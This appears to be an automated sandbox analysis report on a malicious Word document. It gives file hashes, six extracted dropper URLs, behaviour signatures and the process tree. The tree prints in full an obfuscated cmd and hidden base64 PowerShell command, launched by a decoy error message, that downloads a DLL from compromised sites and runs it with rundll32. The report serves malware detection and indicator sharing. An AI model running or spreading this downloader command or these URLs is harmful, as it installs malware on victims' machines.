Analysis

  • max time kernel
    70s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    13-01-2021 09:57

General

  • Target

    E3-20210113_0923.doc

  • Size

    91KB

  • MD5

    68ce5c793dfdd2bd9cf196591a172a14

  • SHA1

    f8dc64b784b851b7c52413208e17991449ee7a0a

  • SHA256

    e7d0a07e178afb890dff585981fd22a443c9928e92d3f7515a34d48d3fc0fb4a

  • SHA512

    0a088b0e77f342fce653680b247a176bd37cf945161bda6fcbd30aed0fb2fffe4f33e8ab2f92d47aa0d7c8bd0e96fd758174f41fd9c12bf92c6887ec53a5c242

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://tmsvinhphuc.com/wp-content/SpeechEngines/

exe.dropper

http://huzurdugunsalonu.com/wp-content/Speech/

exe.dropper

http://personal.unicorp.site/lang/System_32/

exe.dropper

http://christinewalker.org/wp-admin/Xt9SNHtExU/

exe.dropper

http://www.3d.unicorp.site/js/GzVpMLaH/

exe.dropper

http://3d.unicorp.site/js/A1ew/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\E3-20210113_0923.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1740
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAGUATQAgACAAKAAnAFYAYQBSACcAKwAnAEkAYQBCACcAKwAnAEwAZQA6AEsANwBZACcAKwAnAHgAJwArACcAQgAnACkAIAAoACAAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewAwAH0AewAzAH0AewAxAH0AIgAgAC0ARgAgACcASQBPAC4AZAAnACwAJwBZACcALAAnAHMAWQBzAHQAZQBtAC4AJwAsACcAaQBSAGUAQwBUAG8AUgAnACkAIAAgACkAOwAkAFAAWQBmAFYATABJACAAIAA9ACAAIABbAFQAeQBQAEUAXQAoACIAewAwAH0AewA0AH0AewAzAH0AewAyAH0AewA1AH0AewA2AH0AewAxAH0AIgAtAEYAIAAnAFMAWQBzAFQAZQAnACwAJwBHAEUAUgAnACwAJwBlAFQALgBzAGUAcgAnACwAJwAuAG4AJwAsACcATQAnACwAJwB2AEkAYwBlAFAAJwAsACcAbwBJAG4AVABNAGEATgBhACcAKQA7ACAAJABJAHoAZQB5AGMANgB4AD0AJABRADIAMgBTACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABPADIANwBVADsAJABKADIAMABHAD0AKAAoACcARAA3ACcAKwAnADAAJwApACsAJwBUACcAKQA7ACAAJABrADcAeQB4AGIAOgA6ACIAQwBgAFIAYABFAGEAVABlAGAARABpAFIARQBDAHQAYABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnADcAJwArACgAJwA0ACcAKwAnADEAVABpAGkAJwApACsAKAAnAHAAeAA2AGwANwAnACsAJwA0ADEAJwArACcASwBtACcAKQArACgAJwBnADcAJwArACcAdQBlAGcAJwApACsAKAAnADcAJwArACcANAAxACcAKQApACAALQBSAEUAcABMAEEAQwBFACAAKAAnADcANAAnACsAJwAxACcAKQAsAFsAYwBoAEEAUgBdADkAMgApACkAOwAkAFgAXwA4AFkAPQAoACgAJwBVACcAKwAnADYAOAAnACkAKwAnAEgAJwApADsAIAAoACAAIABHAGUAdAAtAGkAVABFAG0AIAAoACcAVgBhAHIAaQBhACcAKwAnAGIAbABFADoAcAB5ACcAKwAnAGYAVgBMACcAKwAnAEkAJwApACAAKQAuAHYAQQBsAHUAZQA6ADoAIgBzAEUAQwBVAFIAaQBgAFQAYABZAHAAUgBvAHQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAMQAnACsAJwAyACcAKQApADsAJABPADMANgBXAD0AKAAoACcAWQA5ACcAKwAnADAAJwApACsAJwBQACcAKQA7ACQAVgA0ADYAOABfAHEAcgAgAD0AIAAoACcAQwAnACsAKAAnADcANwAnACsAJwBFACcAKQApADsAJABFADMAMgBWAD0AKAAnAEcAJwArACgAJwA5ACcAKwAnADQASgAnACkAKQA7ACQAWgBqADUAcwBjAGUAbgA9ACQASABPAE0ARQArACgAKAAoACcAdwA2AFUAVAAnACsAJwBpACcAKwAnAGkAcAB4ADYAbAB3ADYAJwApACsAKAAnAFUAJwArACcASwBtAGcAJwApACsAKAAnADcAdQAnACsAJwBlAGcAdwA2ACcAKQArACcAVQAnACkALgAiAHIAZQBgAHAATABgAEEAQwBlACIAKAAoACcAdwA2ACcAKwAnAFUAJwApACwAWwBzAFQAcgBJAG4AZwBdAFsAYwBoAGEAUgBdADkAMgApACkAKwAkAFYANAA2ADgAXwBxAHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABTADYAMgBHAD0AKAAnAEEAJwArACgAJwA2ADQAJwArACcARQAnACkAKQA7ACQASwBfAHEAMAB0AGoAcgA9ACgAKAAnAEEAJwArACcAXQBbAHEAJwArACcAWwBEADoALwAvACcAKQArACgAJwB0AG0AcwB2ACcAKwAnAGkAbgBoAHAAJwApACsAKAAnAGgAdQBjAC4AYwBvAG0ALwB3ACcAKwAnAHAALQBjACcAKwAnAG8AJwApACsAKAAnAG4AJwArACcAdABlAG4AdAAnACsAJwAvAFMAJwApACsAJwBwAGUAJwArACcAZQAnACsAKAAnAGMAaABFAG4AJwArACcAZwBpAG4AJwApACsAKAAnAGUAcwAnACsAJwAvAEAAQQBdAFsAJwArACcAcQAnACsAJwBbACcAKQArACgAJwBEADoALwAvAGgAdQB6ACcAKwAnAHUAJwApACsAKAAnAHIAZAAnACsAJwB1ACcAKQArACgAJwBnACcAKwAnAHUAbgAnACkAKwAoACcAcwAnACsAJwBhAGwAJwApACsAJwBvACcAKwAoACcAbgAnACsAJwB1AC4AYwBvAG0ALwAnACkAKwAnAHcAcAAnACsAKAAnAC0AYwAnACsAJwBvAG4AdABlACcAKwAnAG4AdAAvAFMAcAAnACkAKwAnAGUAZQAnACsAKAAnAGMAJwArACcAaAAvAEAAJwArACcAQQBdACcAKQArACgAJwBbAHEAJwArACcAWwBEACcAKQArACgAJwA6ACcAKwAnAC8ALwBwAGUAcgAnACkAKwAoACcAcwBvACcAKwAnAG4AJwArACcAYQBsAC4AdQBuAGkAYwAnACsAJwBvAHIAcAAuAHMAaQB0ACcAKwAnAGUALwAnACkAKwAoACcAbABhACcAKwAnAG4AZwAvACcAKwAnAFMAeQBzAHQAZQAnACkAKwAoACcAbQBfACcAKwAnADMAMgAvACcAKQArACcAQABBACcAKwAnAF0AWwAnACsAKAAnAHEAJwArACcAWwBEACcAKQArACcAOgAnACsAKAAnAC8ALwAnACsAJwBjAGgAcgAnACkAKwAoACcAaQAnACsAJwBzAHQAaQBuAGUAdwAnACsAJwBhAGwAJwApACsAJwBrAGUAJwArACgAJwByACcAKwAnAC4AbwByACcAKQArACgAJwBnAC8AdwAnACsAJwBwAC0AYQAnACsAJwBkAG0AaQBuAC8AWAAnACsAJwB0ADkAJwApACsAJwBTACcAKwAoACcATgAnACsAJwBIAHQARQAnACkAKwAoACcAeAAnACsAJwBVAC8AQABBACcAKQArACgAJwBdAFsAcQBbACcAKwAnAEQAOgAvACcAKwAnAC8AdwB3ACcAKQArACcAdwAuACcAKwAoACcAMwAnACsAJwBkAC4AJwArACcAdQBuAGkAYwBvACcAKwAnAHIAcAAnACsAJwAuAHMAaQB0AGUALwAnACsAJwBqAHMAJwArACcALwBHAHoAVgBwAE0AJwApACsAKAAnAEwAYQBIAC8AJwArACcAQAAnACkAKwAnAEEAJwArACcAXQBbACcAKwAoACcAcQBbAEQAOgAnACsAJwAvACcAKQArACcALwAnACsAKAAnADMAZAAnACsAJwAuAHUAbgAnACkAKwAnAGkAJwArACgAJwBjACcAKwAnAG8AcgAnACkAKwAnAHAAJwArACgAJwAuAHMAaQAnACsAJwB0ACcAKQArACgAJwBlAC8AagBzAC8AJwArACcAQQAxACcAKwAnAGUAdwAnACkAKwAnAC8AJwApAC4AIgBSAGAARQBQAGwAYABBAGMARQAiACgAKAAoACcAQQBdACcAKwAnAFsAJwApACsAJwBxACcAKwAnAFsARAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACgAJwBkAHMAJwArACcAZQB3ACcAKQArACcAZgAnACkALAAoACgAJwB3AGUAJwArACcAdgAnACkAKwAnAHcAZQAnACkAKQAsACgAKAAnAGEAZQAnACsAJwBmACcAKQArACcAZgAnACkALAAoACgAJwBoACcAKwAnAHQAdAAnACkAKwAnAHAAJwApACkAWwAyAF0AKQAuACIAcwBwAGwAYABJAHQAIgAoACQARQA4AF8ARgAgACsAIAAkAEkAegBlAHkAYwA2AHgAIAArACAAJABLADgAMwBQACkAOwAkAEgANAA2AEwAPQAoACcAUAA1ACcAKwAnADAARwAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEIAawB1AHoANQBfADkAIABpAG4AIAAkAEsAXwBxADAAdABqAHIAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAdwAnACsAJwAtAE8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAHMAWQBTAHQAZQBtAC4ATgBFAFQALgBXAGUAQgBjAEwASQBlAG4AVAApAC4AIgBEAG8AYAB3AE4ATABgAG8AYABBAGQAZgBpAEwARQAiACgAJABCAGsAdQB6ADUAXwA5ACwAIAAkAFoAagA1AHMAYwBlAG4AKQA7ACQAVQAwADIATgA9ACgAJwBMADcAJwArACcAOABBACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABaAGoANQBzAGMAZQBuACkALgAiAGwAZQBuAGAAZwB0AGgAIgAgAC0AZwBlACAAMwAyADcAOQA4ACkAIAB7AC4AKAAnAHIAJwArACcAdQBuAGQAbABsADMAMgAnACkAIAAkAFoAagA1AHMAYwBlAG4ALAAoACcAUwAnACsAKAAnAGgAbwAnACsAJwB3ACcAKQArACgAJwBEACcAKwAnAGkAYQAnACkAKwAoACcAbABvACcAKwAnAGcAQQAnACkAKQAuACIAdABPAFMAYABUAGAAUgBpAE4ARwAiACgAKQA7ACQASQA1ADQASQA9ACgAKAAnAEcAMAAnACsAJwAzACcAKQArACcAUQAnACkAOwBiAHIAZQBhAGsAOwAkAE4AOQA3AEMAPQAoACgAJwBBADgAJwArACcAXwAnACkAKwAnAEEAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABSADEAMABDAD0AKAAnAE0ANQAnACsAJwAwAEQAJwApAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:328
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:1668
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAGUATQAgACAAKAAnAFYAYQBSACcAKwAnAEkAYQBCACcAKwAnAEwAZQA6AEsANwBZACcAKwAnAHgAJwArACcAQgAnACkAIAAoACAAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewAwAH0AewAzAH0AewAxAH0AIgAgAC0ARgAgACcASQBPAC4AZAAnACwAJwBZACcALAAnAHMAWQBzAHQAZQBtAC4AJwAsACcAaQBSAGUAQwBUAG8AUgAnACkAIAAgACkAOwAkAFAAWQBmAFYATABJACAAIAA9ACAAIABbAFQAeQBQAEUAXQAoACIAewAwAH0AewA0AH0AewAzAH0AewAyAH0AewA1AH0AewA2AH0AewAxAH0AIgAtAEYAIAAnAFMAWQBzAFQAZQAnACwAJwBHAEUAUgAnACwAJwBlAFQALgBzAGUAcgAnACwAJwAuAG4AJwAsACcATQAnACwAJwB2AEkAYwBlAFAAJwAsACcAbwBJAG4AVABNAGEATgBhACcAKQA7ACAAJABJAHoAZQB5AGMANgB4AD0AJABRADIAMgBTACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABPADIANwBVADsAJABKADIAMABHAD0AKAAoACcARAA3ACcAKwAnADAAJwApACsAJwBUACcAKQA7ACAAJABrADcAeQB4AGIAOgA6ACIAQwBgAFIAYABFAGEAVABlAGAARABpAFIARQBDAHQAYABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnADcAJwArACgAJwA0ACcAKwAnADEAVABpAGkAJwApACsAKAAnAHAAeAA2AGwANwAnACsAJwA0ADEAJwArACcASwBtACcAKQArACgAJwBnADcAJwArACcAdQBlAGcAJwApACsAKAAnADcAJwArACcANAAxACcAKQApACAALQBSAEUAcABMAEEAQwBFACAAKAAnADcANAAnACsAJwAxACcAKQAsAFsAYwBoAEEAUgBdADkAMgApACkAOwAkAFgAXwA4AFkAPQAoACgAJwBVACcAKwAnADYAOAAnACkAKwAnAEgAJwApADsAIAAoACAAIABHAGUAdAAtAGkAVABFAG0AIAAoACcAVgBhAHIAaQBhACcAKwAnAGIAbABFADoAcAB5ACcAKwAnAGYAVgBMACcAKwAnAEkAJwApACAAKQAuAHYAQQBsAHUAZQA6ADoAIgBzAEUAQwBVAFIAaQBgAFQAYABZAHAAUgBvAHQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAMQAnACsAJwAyACcAKQApADsAJABPADMANgBXAD0AKAAoACcAWQA5ACcAKwAnADAAJwApACsAJwBQACcAKQA7ACQAVgA0ADYAOABfAHEAcgAgAD0AIAAoACcAQwAnACsAKAAnADcANwAnACsAJwBFACcAKQApADsAJABFADMAMgBWAD0AKAAnAEcAJwArACgAJwA5ACcAKwAnADQASgAnACkAKQA7ACQAWgBqADUAcwBjAGUAbgA9ACQASABPAE0ARQArACgAKAAoACcAdwA2AFUAVAAnACsAJwBpACcAKwAnAGkAcAB4ADYAbAB3ADYAJwApACsAKAAnAFUAJwArACcASwBtAGcAJwApACsAKAAnADcAdQAnACsAJwBlAGcAdwA2ACcAKQArACcAVQAnACkALgAiAHIAZQBgAHAATABgAEEAQwBlACIAKAAoACcAdwA2ACcAKwAnAFUAJwApACwAWwBzAFQAcgBJAG4AZwBdAFsAYwBoAGEAUgBdADkAMgApACkAKwAkAFYANAA2ADgAXwBxAHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABTADYAMgBHAD0AKAAnAEEAJwArACgAJwA2ADQAJwArACcARQAnACkAKQA7ACQASwBfAHEAMAB0AGoAcgA9ACgAKAAnAEEAJwArACcAXQBbAHEAJwArACcAWwBEADoALwAvACcAKQArACgAJwB0AG0AcwB2ACcAKwAnAGkAbgBoAHAAJwApACsAKAAnAGgAdQBjAC4AYwBvAG0ALwB3ACcAKwAnAHAALQBjACcAKwAnAG8AJwApACsAKAAnAG4AJwArACcAdABlAG4AdAAnACsAJwAvAFMAJwApACsAJwBwAGUAJwArACcAZQAnACsAKAAnAGMAaABFAG4AJwArACcAZwBpAG4AJwApACsAKAAnAGUAcwAnACsAJwAvAEAAQQBdAFsAJwArACcAcQAnACsAJwBbACcAKQArACgAJwBEADoALwAvAGgAdQB6ACcAKwAnAHUAJwApACsAKAAnAHIAZAAnACsAJwB1ACcAKQArACgAJwBnACcAKwAnAHUAbgAnACkAKwAoACcAcwAnACsAJwBhAGwAJwApACsAJwBvACcAKwAoACcAbgAnACsAJwB1AC4AYwBvAG0ALwAnACkAKwAnAHcAcAAnACsAKAAnAC0AYwAnACsAJwBvAG4AdABlACcAKwAnAG4AdAAvAFMAcAAnACkAKwAnAGUAZQAnACsAKAAnAGMAJwArACcAaAAvAEAAJwArACcAQQBdACcAKQArACgAJwBbAHEAJwArACcAWwBEACcAKQArACgAJwA6ACcAKwAnAC8ALwBwAGUAcgAnACkAKwAoACcAcwBvACcAKwAnAG4AJwArACcAYQBsAC4AdQBuAGkAYwAnACsAJwBvAHIAcAAuAHMAaQB0ACcAKwAnAGUALwAnACkAKwAoACcAbABhACcAKwAnAG4AZwAvACcAKwAnAFMAeQBzAHQAZQAnACkAKwAoACcAbQBfACcAKwAnADMAMgAvACcAKQArACcAQABBACcAKwAnAF0AWwAnACsAKAAnAHEAJwArACcAWwBEACcAKQArACcAOgAnACsAKAAnAC8ALwAnACsAJwBjAGgAcgAnACkAKwAoACcAaQAnACsAJwBzAHQAaQBuAGUAdwAnACsAJwBhAGwAJwApACsAJwBrAGUAJwArACgAJwByACcAKwAnAC4AbwByACcAKQArACgAJwBnAC8AdwAnACsAJwBwAC0AYQAnACsAJwBkAG0AaQBuAC8AWAAnACsAJwB0ADkAJwApACsAJwBTACcAKwAoACcATgAnACsAJwBIAHQARQAnACkAKwAoACcAeAAnACsAJwBVAC8AQABBACcAKQArACgAJwBdAFsAcQBbACcAKwAnAEQAOgAvACcAKwAnAC8AdwB3ACcAKQArACcAdwAuACcAKwAoACcAMwAnACsAJwBkAC4AJwArACcAdQBuAGkAYwBvACcAKwAnAHIAcAAnACsAJwAuAHMAaQB0AGUALwAnACsAJwBqAHMAJwArACcALwBHAHoAVgBwAE0AJwApACsAKAAnAEwAYQBIAC8AJwArACcAQAAnACkAKwAnAEEAJwArACcAXQBbACcAKwAoACcAcQBbAEQAOgAnACsAJwAvACcAKQArACcALwAnACsAKAAnADMAZAAnACsAJwAuAHUAbgAnACkAKwAnAGkAJwArACgAJwBjACcAKwAnAG8AcgAnACkAKwAnAHAAJwArACgAJwAuAHMAaQAnACsAJwB0ACcAKQArACgAJwBlAC8AagBzAC8AJwArACcAQQAxACcAKwAnAGUAdwAnACkAKwAnAC8AJwApAC4AIgBSAGAARQBQAGwAYABBAGMARQAiACgAKAAoACcAQQBdACcAKwAnAFsAJwApACsAJwBxACcAKwAnAFsARAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACgAJwBkAHMAJwArACcAZQB3ACcAKQArACcAZgAnACkALAAoACgAJwB3AGUAJwArACcAdgAnACkAKwAnAHcAZQAnACkAKQAsACgAKAAnAGEAZQAnACsAJwBmACcAKQArACcAZgAnACkALAAoACgAJwBoACcAKwAnAHQAdAAnACkAKwAnAHAAJwApACkAWwAyAF0AKQAuACIAcwBwAGwAYABJAHQAIgAoACQARQA4AF8ARgAgACsAIAAkAEkAegBlAHkAYwA2AHgAIAArACAAJABLADgAMwBQACkAOwAkAEgANAA2AEwAPQAoACcAUAA1ACcAKwAnADAARwAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEIAawB1AHoANQBfADkAIABpAG4AIAAkAEsAXwBxADAAdABqAHIAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAdwAnACsAJwAtAE8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAHMAWQBTAHQAZQBtAC4ATgBFAFQALgBXAGUAQgBjAEwASQBlAG4AVAApAC4AIgBEAG8AYAB3AE4ATABgAG8AYABBAGQAZgBpAEwARQAiACgAJABCAGsAdQB6ADUAXwA5ACwAIAAkAFoAagA1AHMAYwBlAG4AKQA7ACQAVQAwADIATgA9ACgAJwBMADcAJwArACcAOABBACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABaAGoANQBzAGMAZQBuACkALgAiAGwAZQBuAGAAZwB0AGgAIgAgAC0AZwBlACAAMwAyADcAOQA4ACkAIAB7AC4AKAAnAHIAJwArACcAdQBuAGQAbABsADMAMgAnACkAIAAkAFoAagA1AHMAYwBlAG4ALAAoACcAUwAnACsAKAAnAGgAbwAnACsAJwB3ACcAKQArACgAJwBEACcAKwAnAGkAYQAnACkAKwAoACcAbABvACcAKwAnAGcAQQAnACkAKQAuACIAdABPAFMAYABUAGAAUgBpAE4ARwAiACgAKQA7ACQASQA1ADQASQA9ACgAKAAnAEcAMAAnACsAJwAzACcAKQArACcAUQAnACkAOwBiAHIAZQBhAGsAOwAkAE4AOQA3AEMAPQAoACgAJwBBADgAJwArACcAXwAnACkAKwAnAEEAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABSADEAMABDAD0AKAAnAE0ANQAnACsAJwAwAEQAJwApAA==
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1672
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Tiipx6l\Kmg7ueg\C77E.dll ShowDialogA
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1068
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Tiipx6l\Kmg7ueg\C77E.dll ShowDialogA
            4⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:516
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qrcwbbmc\tcjxcgg.pvc",ShowDialogA
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              PID:1612

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Tiipx6l\Kmg7ueg\C77E.dll
      MD5

      6226d85813ba587416c7c498eb5bb495

      SHA1

      014a2fadd317abe7c981386dbed1e4aff1c7edac

      SHA256

      c7c6ebd263ddd8acbbeb35b244f0efe9f20766db1a5e4151417ac305829838c6

      SHA512

      f2c7915d2fbe2dca0fde9666693cb2638e390d9bc9144e52ad5afa9d862d7672825321e7abc2d42c637686a4cac64f74d3b065aead332d1ae1ee72b13d782581

    • \Users\Admin\Tiipx6l\Kmg7ueg\C77E.dll
      MD5

      6226d85813ba587416c7c498eb5bb495

      SHA1

      014a2fadd317abe7c981386dbed1e4aff1c7edac

      SHA256

      c7c6ebd263ddd8acbbeb35b244f0efe9f20766db1a5e4151417ac305829838c6

      SHA512

      f2c7915d2fbe2dca0fde9666693cb2638e390d9bc9144e52ad5afa9d862d7672825321e7abc2d42c637686a4cac64f74d3b065aead332d1ae1ee72b13d782581

    • \Users\Admin\Tiipx6l\Kmg7ueg\C77E.dll
      MD5

      6226d85813ba587416c7c498eb5bb495

      SHA1

      014a2fadd317abe7c981386dbed1e4aff1c7edac

      SHA256

      c7c6ebd263ddd8acbbeb35b244f0efe9f20766db1a5e4151417ac305829838c6

      SHA512

      f2c7915d2fbe2dca0fde9666693cb2638e390d9bc9144e52ad5afa9d862d7672825321e7abc2d42c637686a4cac64f74d3b065aead332d1ae1ee72b13d782581

    • \Users\Admin\Tiipx6l\Kmg7ueg\C77E.dll
      MD5

      6226d85813ba587416c7c498eb5bb495

      SHA1

      014a2fadd317abe7c981386dbed1e4aff1c7edac

      SHA256

      c7c6ebd263ddd8acbbeb35b244f0efe9f20766db1a5e4151417ac305829838c6

      SHA512

      f2c7915d2fbe2dca0fde9666693cb2638e390d9bc9144e52ad5afa9d862d7672825321e7abc2d42c637686a4cac64f74d3b065aead332d1ae1ee72b13d782581

    • \Users\Admin\Tiipx6l\Kmg7ueg\C77E.dll
      MD5

      6226d85813ba587416c7c498eb5bb495

      SHA1

      014a2fadd317abe7c981386dbed1e4aff1c7edac

      SHA256

      c7c6ebd263ddd8acbbeb35b244f0efe9f20766db1a5e4151417ac305829838c6

      SHA512

      f2c7915d2fbe2dca0fde9666693cb2638e390d9bc9144e52ad5afa9d862d7672825321e7abc2d42c637686a4cac64f74d3b065aead332d1ae1ee72b13d782581

    • memory/432-19-0x000007FEF63D0000-0x000007FEF664A000-memory.dmp
      Filesize

      2.5MB

    • memory/516-13-0x0000000000000000-mapping.dmp
    • memory/1068-11-0x0000000000000000-mapping.dmp
    • memory/1612-18-0x0000000000000000-mapping.dmp
    • memory/1668-2-0x0000000000000000-mapping.dmp
    • memory/1672-6-0x000000001AE10000-0x000000001AE11000-memory.dmp
      Filesize

      4KB

    • memory/1672-10-0x000000001C5F0000-0x000000001C5F1000-memory.dmp
      Filesize

      4KB

    • memory/1672-9-0x000000001AAC0000-0x000000001AAC1000-memory.dmp
      Filesize

      4KB

    • memory/1672-8-0x0000000001F90000-0x0000000001F91000-memory.dmp
      Filesize

      4KB

    • memory/1672-7-0x0000000002420000-0x0000000002421000-memory.dmp
      Filesize

      4KB

    • memory/1672-5-0x0000000002580000-0x0000000002581000-memory.dmp
      Filesize

      4KB

    • memory/1672-4-0x000007FEF54A0000-0x000007FEF5E8C000-memory.dmp
      Filesize

      9.9MB

    • memory/1672-3-0x0000000000000000-mapping.dmp